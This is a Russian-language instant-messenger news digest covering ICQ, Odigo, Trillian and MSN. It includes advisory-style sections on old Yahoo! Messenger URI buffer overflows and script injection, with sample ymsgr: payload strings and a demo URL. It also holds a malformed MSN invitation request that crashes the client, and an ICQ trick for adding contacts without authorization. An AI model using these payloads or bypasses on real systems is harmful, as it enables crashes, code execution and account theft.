На club.handy.ru можно почитать статью Тестируем «аську» на Pocket PC.

Американская компания Comverse, подразделение Comverse Technology, купила компанию Odigo, создавшую одноименный аналог ICQ. Цена сделки - около 20 млн. долларов. К этому моменту Comverse уже являлась акционером Odigo - ей принадлежали 12,4% акций.
Odigo, известная в России своим интернет-пейджером, совместимым с ICQ, кроме него, создала системы обмена сообщениями и для платформ Pocket PC, Palm, для Compaq Blackberry, для мобильных телефонов с WAP и Java, а в перспективе, у нее появятся разработки для I-Mode, Symbian и BREW. Все эти наработки Odigo будут применены в новых продуктах Comverse - чатах, SMS и MMS, голосовой почте, конференц-связи и других. Цель компании - создать основанную на IP-протоколе открытую платформу для операторов мобильной связи поколения 3/2.5, на которой они могли бы быстро разворачивать подобные сервисы.

1. Переполнение буфера
Yahoo! Messenger при установке конфигурирует URI обработчик 'ymsgr:'. Обработчик вызывает YPAGER.EXE со снабженными параметрами. YPAGER.EXE принимает параметр 'call'; он используется для запуска особенности 'Call Center'.
Переполнение буфера в 'Call Center' можно вызвать через специально сконструированный URI. Переполнение произойдет, если параметр 'call', пропущенный к YPAGER.EXE, будет более 268 байт.
Пример: ymsgr:call?+
Другие параметры также восприимчивы к переполнению буфера (но параметр должен быть на 100 байтов больше):
ymsgr:sendim?+/aaaaaaa..... 368 bytes here/
ymsgr:chat?+/aaaaaa..... 368 bytes here/
ymsgr:addview?+/aaaaaa..... 368 bytes here/
ymsgr:addfriend?+/aaaaaa..... 368 bytes here/
Уязвимость может использоваться для удаленного выполнения произвольного кода на уязвимой системе.
2. Похищение учетной записи пользователя
URL, начинающиеся с "ymsgr:addview?" позволяют пользователям добавлять Web содержание Yahoo! к "Content Tabs" YIM для последующего просмотра в YIM, без web-браузера. YIM устанавливает по умолчанию настройки просмотра календаря, погоды, новостей и т.п.
Следующий URL демонстрирует уязвимость ( у вас должен быть установлен YaHoo! Messenger (YIM) интегрированный в совместимый Web браузер):
ymsgr:addview?http://rd.yahoo.com/messenger/?http://viceconsulting.com/cons/servs/infosec/yimvul001/DemH0.htm Уязвимость позволяет копировать почти любое содержание YIM ( в т.ч. и данные учетной записи) и вставлять произвольные сценарии, которые будут выполнены на YIM машине пользователей.
Уязвимость обнаружена в Yahoo! Messenger 5.0

Msn Messenger - популярный интернет пейджер от Microsoft для Windows систем.
Уродливый запрос, содержащий закодированные символы пробела (%20) в поле Invitation-Cookie, посланный удаленному пользователю, может привести к зависанию клиента Microsoft MSN Messenger.
Уязвимость обнаружена в Microsoft MSN Messenger Service 1.0-4.6
Пример:
MIME-Version: 1.0
Content-Type: text/x-msmsgsinvite; charset=UTF-8
Application-Name: Remote Assistance
Application-GUID: {56b994a7-380f-410b-9985-c809d78c1bdc}
Session-Protocol: SM1
Application-URL: http://www.microsoft.com
Invitation-Command: INVITE
Invitation-Cookie: 54902160%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
Session-ID: {8B1BE64F-4019-489D-B1A3-EC0BA993651B}

Jupiter Media Metrix замерила рост числа пользователей нового интернет-пейджера Trillian, который позволяет общаться между собой пользователям систем мгновенного обмена сообщениями Yahoo, MSN, AOL и ICQ. Популярность универсальной программы растет значительно быстрее, чем это имело место у отдельных сервисов, с которыми она совместима. Только за февраль аудитория Trillian возросла с 344 000 до 610 000 пользователей. В сравнении с десятками миллионов пользователей лидеров рынка AIM и ICQ по абсолютной величине, это не много. Но темпы роста подтверждают востребованность в народе совместимости и интеграции данных сервисов.

Компании America Online и CNET Networks объявили о том, что программа ICQ скачивалась с сайта Download.com уже более 200 миллионов раз. Известный интернет-пейджер стал самой скачиваемой программой сайта Download.com, который принадлежит сети CNET. Download.com - один из крупнейших сайтов, на котором хранятся более 50000 бесплатных и пробных версий различных программ. По информации владельцев сайта, посетители Download.com ежедневно скачивают около 2,5 миллионов файлов.
ICQ была создана израильской компанией Mirabilis в 1996 году, а в 1998 году эта программа и сопутствующий сервис были приобретены AOL. Сейчас технология ICQ полностью принадлежит американской интернет-компании America Online. Возникнув как одно из первых средств обмена сообщениями через интернет, ICQ превратилась сегодня в огромный международный коммуникационный центр, имеющий более 130 миллионов зарегистрированных пользователей во всем мире.
Каждый зарегистрированный пользователь ежедневно подключается к сервису ICQ и пользуется им, в среднем, около четырех часов. Впервые программа появилась на сайте Download.com в 1996 году, затем на сайт выкладывались ее новые версии, и каждая из них неизменно входила в список самых популярных программ, скачиваемых с этого сайта. В настоящее время на сайте download.com можно скачать самую последнюю версию ICQ 2002a.

Если кто не понял - речь идёт о замене стандарнтых бегущих физиономий в аське. Многие с них бесятся и выдумывают всяческие замены. Сегодня вам предлагаются две альтернативные версии. Одну из них - игральную кость - вы, возможно, видели видели на моих скриншотах, а другую вчера прислал Кову, за что ему спасибо.
Косточку же мне подарил AleZZandre. Подарил давным-давно, но чё-та как-та... ну, в общем не доходили руки про неё рассказать Посыпая пеплом свою пернатую голову, исправляю ошибку.
В архиве два файла. Выберите, что больше понравилось, переименуйте в ICQworking.avi и сбросьте в аськин каталог вместо старого авишника.

Если вы пробовали устанавливать 2001/2002 аську поверх 2000, то наверняка заметили, что она загружает найденные в старой (2000) базе контакты на сервер. При этом не происходит повторного запроса на авторизацию, т.е. она полагает, что весь ваш список контактов появился у вас абсолютно легально.

Эта слабость позволяет проделать следующую интересную комбинацию. Можно добавить контакт в 2000 аську, потом удалить .dat и .idx в 2001/2002, сбросить на их место одноименные файлы от 2000 и запусить 2001/2002-ю аську. Как сообщает MOHAX_Tyk, при этом последняя запросто проглатывает эти два файла и благополучно добавляет их в список на сервере. Самое замечательное при этом, что контакты, уже существующие на сервере не пропадают!

Понятно, что описанный выше способ сопряжён с некоторым неудобствами и менее комфортен, что простое добавление в 2000, но тем не менее, это способ.

Ваши отызвы с нетерпением ждём на форуме.

От себя могу добавить следующее. Ежели вышеописанная технология работает, то по-видимому, не обязательно иметь на машине обе версии установленными, а можно сохранить пару .dat и .idx от 2000 аськи, и при необходимости просто изменять в них один уин на другой(который нужно добавить). Это легко сделать, например, с помощью моего UIN Replacer'а, описание к которому можно найти в нашем 41-м выпуске.

Ещё раз напоминаю, что мы ждём ваших комментариев.

Смотрите сами. Комментарии, думаю, излишни...

Источник: Благодарить "Return-path <admin@rambler.ru>"

Вышла новая версия лучшего по моему мнению клона ICQ (а так же AIM, MSN, YAHOO - мессенджеров и IRC -клиента). Если Вы ещё не попробовали эту прелесть, то Вам остаётся лишь посочувствовать.

Кратко опишу возможности Триллиан, как клона Аськи. Прежде всего, это полная поддержка протокола ICQ 2000, включая так необходимое скрытия Вашего IP-адреса и автоматический показ нескрытых IP ваших собеседников. Политика безопасности и приватности в Триллиан реализована гораздо лучше, чем у самих Мирабилис. Нужно лишь быть внимательными при настройке.

Триллиан поддерживает несколько ICQ (и не только ICQ)аккаунтов на одном компьютере, причём (sic!) контакт-лист является ОБЩИМ для любого вашего UINa. Таким образом, исчезает проблема переноса конактов с одного аккаунта на другой.

Немного куцая реализация отображения INFO ваших собеседников с лихвой восполняется возможнойстью произвольного заполнения INFO Вашего собственного (будьте осторожны, ходят слухи, что Мирабилис удаляет аккаунты с нестандартной инфой ). Поддерживается даже передача и приём файлов. Разумеется, о приватности в этом случае разговор не идёт.

Хочется отметить ещё одну потрясающую особенность. Пользовательскй интерфейс программы полностью описывается в формате XML 1.0, благодаря чему, можно как угодно глубоко настроить его по своему вкусу (смерть твикеров? ) самостоятельно, либо выбрав один из большой коллекции шкур (скинов). И это будет не просто другая картинка, натянутая на мордочку Триллиан, как например у ВинАМПа, а совершенно иная реализация и расположение самих элементов управления - меню, кнопок и т.д.

Присущая всем оригинальным версиям немультилайновость окошек для ввода пароля исправляется проверенным методом.

Что касается настройки файервола. Для работы ICQ-части Триллиан достаточно разрешить исходящие соединения на все порты диапазонов [64.12.1.1 - 64.12.255.255] и [205.188.1.1 - 205.188.255.255]. Для работы MSN достаточно исходящих на все порты диапазона [64.4.0.0 - 64.4.63.255]. В моём случае (сейчас я использую эту программу, а не ICQ) других сервисов не нужно, поэтому для пущей уверенности я заблокировал доступ с/на другие адреса.

Размер дистрибутива - чуть больше 2 мегабайт. Для тех, кто любит покопаться в настройках - это идеальный вариант клиента.
Всё перечисленное выше - лишь ничтожная часть всех фич Триллиан. Искренне советую - попробуйте.

Обязательно загляните на форум!!!